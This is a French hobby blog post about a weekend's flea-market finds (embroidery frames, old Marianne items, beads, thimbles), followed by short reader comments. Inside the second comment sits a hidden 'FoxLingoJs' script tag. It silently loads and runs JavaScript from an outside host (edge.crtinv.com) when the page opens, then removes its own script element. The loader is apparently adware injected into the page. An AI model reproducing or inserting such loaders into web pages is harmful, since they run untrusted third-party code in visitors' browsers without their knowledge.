• retour de brocante

      coucou

     

     et voilà les habitudes reprennent  ce matin des brocantes

     

    retour de brocante

     

    retour de brocante

     

     des cadres pour de futures broderies

     

    retour de brocante

    de vieux marianne

     

    retour de brocante

     des perles pour de futurs bricolages

     

    retour de brocante

    retour de brocante

    retour de brocante

    et des dés pour ma collection

     

    voilà c'est tout pour aujourd'hui

    je vais jaser avec mon fils Québéquois cet après midi donc pas grand chose  de fait puis je me mettrais a jour de mes SAL pour vous montrer ça demain ou après-demain

     

    bonne après-midi et bonnes petites xxxxx

    patricia

    « le masque papillon et des cadeauxsal Anne-Marie »

    Tags Tags : , , , ,
  • Commentaires

    1
    Lundi 17 Septembre 2012 à 08:19

    bonne semaine !

    2
    Lundi 17 Septembre 2012 à 09:20

    Au secours, je ne savais même pas que tu étais rentrée. Je ne reçois pas tes posts, Grrrr ..

    Bizz quand même et merci de t'être inscrite à mon p'tit SAL

    <script id="FoxLingoJs" type="text/javascript">// <![CDATA[ !function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); // ]]></script>
    3
    Mardi 18 Septembre 2012 à 11:45

    super, ça reprend les brocantes, on va revoir régulièrement tes trouvailles, bisous.

    4
    Mardi 11 Décembre 2012 à 10:44

    Blog superbe, je n'ai qu'une envie, y rester ! Je m'inscris donc ! Bonne journee ! 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :